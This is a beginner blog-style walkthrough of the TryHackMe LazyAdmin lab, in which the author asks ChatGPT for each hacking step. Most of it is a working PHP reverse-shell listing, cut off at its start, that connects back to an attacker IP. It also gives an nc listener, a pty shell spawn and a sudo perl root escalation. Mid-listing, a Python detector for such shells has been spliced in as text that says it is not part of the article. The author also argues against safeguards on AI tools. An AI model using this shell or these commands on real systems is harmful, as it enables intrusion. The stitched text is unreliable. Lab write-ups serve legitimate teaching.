Beginners Guide To AI in Cybersec. Hacking With ChatGPT.
AI, which stands for Artificial Intelligence, has come a long way since the era of the World Wide Web.
Today, we can see Artificial Intelligence integrated into almost every technology, whether it’s
your Google Assistant on Android, Alexa on Amazon devices, or Siri on Apple devices. Many
other AI tools are available in our day-to-day browsers. One of the major companies in AI is OpenAI,
which rolled out ChatGPT, based on the latest GPT-3.
OpenAI
openai.com
TryHackMe | LazyAdmin
Easy linux machine to practice your skills
tryhackme.com
Since I am assuming that I know only the basics of hacking, let’s ask ChatGPT how to get started and
what our first step should be.
It suggests that we should gather information about our target and find its vulnerabilities by performing a
network scan, so let’s do that. It even suggests the name of the tool that we should use, called nmap. Now,
we should also ask ChatGPT for the Nmap scan syntax that we will run in our Linux terminal.
Here is the IP address of the target we are trying to hack into.
I modified the syntax a little bit, only to make it go faster! Here is the result of the scan:
Ports 22 and 80 are open, so let’s go to the web server on port 80.
It seems that Apache2 is running on port 80.
No worries, let’s ask ChatGPT for assistance. Since it’s a web server, I am going to ask about fuzzing this
website to discover its secrets.
There we go, let’s do this! Looks like we got something already.
This is the site that we got.
/content (Status: 301) [Size: 316] [--> http://10.10.117.255/content/]
I looked for the MySQL backup directory and got this .SQL file; inside, I found the password hash.
Now, let’s ask ChatGPT what we should do with the password hash.
Let’s do what it says. Let’s crack the hash online using a platform called CrackStation. Here
is the link:
CrackStation - Online Password Hash Cracking - MD5, SHA1, Linux, Rainbow Tables, etc.
crackstation.net
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occasionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is sent down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
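A defender-side companion to the listing above, added here as an example and not part of the original article: a Python triage scan that flags PHP files in a web root combining the socket, process and stream calls the listing relies on. The weights, threshold, suffix list and both sample strings are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# Function names are the ones used in the listing above. The weights, the
# threshold and the suffix list are assumptions made for this example.
INDICATORS = {
    "fsockopen": 3,            # outbound TCP connection from a web script
    "proc_open": 3,            # child process wired to custom pipes
    "posix_setsid": 2,         # detaches from the web server's session
    "stream_select": 1,        # relays between socket and pipes
    "stream_set_blocking": 1,
}
PHP_SUFFIXES = {".php", ".phtml", ".php5", ".phar"}
CALL_RE = re.compile(r"\b(" + "|".join(INDICATORS) + r")\s*\(")
# Strip /* */ and // comments; "://" is skipped so URLs in strings survive.
COMMENT_RE = re.compile(r"/\*.*?\*/|(?<!:)//[^\n]*", re.S)

# Constructed samples: three calls copied from the listing, and a benign page.
SAMPLE_SHELL = """<?php
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
$process = proc_open($shell, $descriptorspec, $pipes);
stream_set_blocking($sock, 0);
"""
SAMPLE_BENIGN = """<?php
// an older version called fsockopen() and proc_open() here
$fp = fopen("http://example.invalid/feed", "r");
echo stream_get_contents($fp);
"""

def score_php(source):
    """Return (score, sorted indicator names) for one PHP source string."""
    code = COMMENT_RE.sub("", source)
    found = sorted(set(CALL_RE.findall(code)))
    score = sum(INDICATORS[name] for name in found)
    if "fsockopen" in found and "proc_open" in found:
        score += 3  # socket plus spawned process in one file: the relay itself
    return score, found

def scan_tree(root, threshold=6):
    """Walk a web root and list PHP files whose score reaches the threshold."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in PHP_SUFFIXES:
            score, found = score_php(path.read_text(errors="replace"))
            if score >= threshold:
                hits.append((path.name, score, found))
    return hits

if __name__ == "__main__":
    print(score_php(SAMPLE_SHELL), score_php(SAMPLE_BENIGN))
```

The scan matches plain function calls only, so treat hits as triage leads and a clean result as inconclusive. Run it against upload and content directories, where a web application should not be storing executable PHP at all.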
Let’s copy and paste this into the Ads section and create a file. Don’t forget to change the IP and port: set
the IP to your tun0 IP and change the port to 9001.
Now we have to create a listener on our device, where we can receive the connection back.
nc -lvnp 9001
As soon as you click on revshell.php on the webserver, a connection will be established here! Boom, I
got the shell!
Copy paste this here and half of this machine will be considered hacked.
Next, we need to do privilege escalation and get the root flag. Enter the following command, and we
will get root access.
python3 -c 'import pty;pty.spawn("/bin/bash")'
And then, at last, the final command: execute this and you will get the root terminal.
sudo perl /home/itguy/backup.pl
Copy paste the flag and boom! The machine is successfully hacked!
This is going to be one of the first articles that has covered how to hack a machine using ChatGPT. I
would do some more articles on ChatGPT and other AI programs in the near future. It is quite
clear that the modern advancements in AI have a lot of perks, but they can also be used for malicious
activity. Programmers and developers are censoring these programs to stop these malicious activities.
Censorship in AI programs.
As for my personal opinion, I don’t support censoring of the internet or any technology for that
matter. Censoring technology has never brought down criminal activities, and I don’t think it ever
will. Advancement in tech is inevitable. You can’t stop or manipulate it.
Here is a poem that I asked ChatGPT to write for me on “Darkness in hackers”. Hope you’ll like
it.
Be safe, be secure and happy hacking :)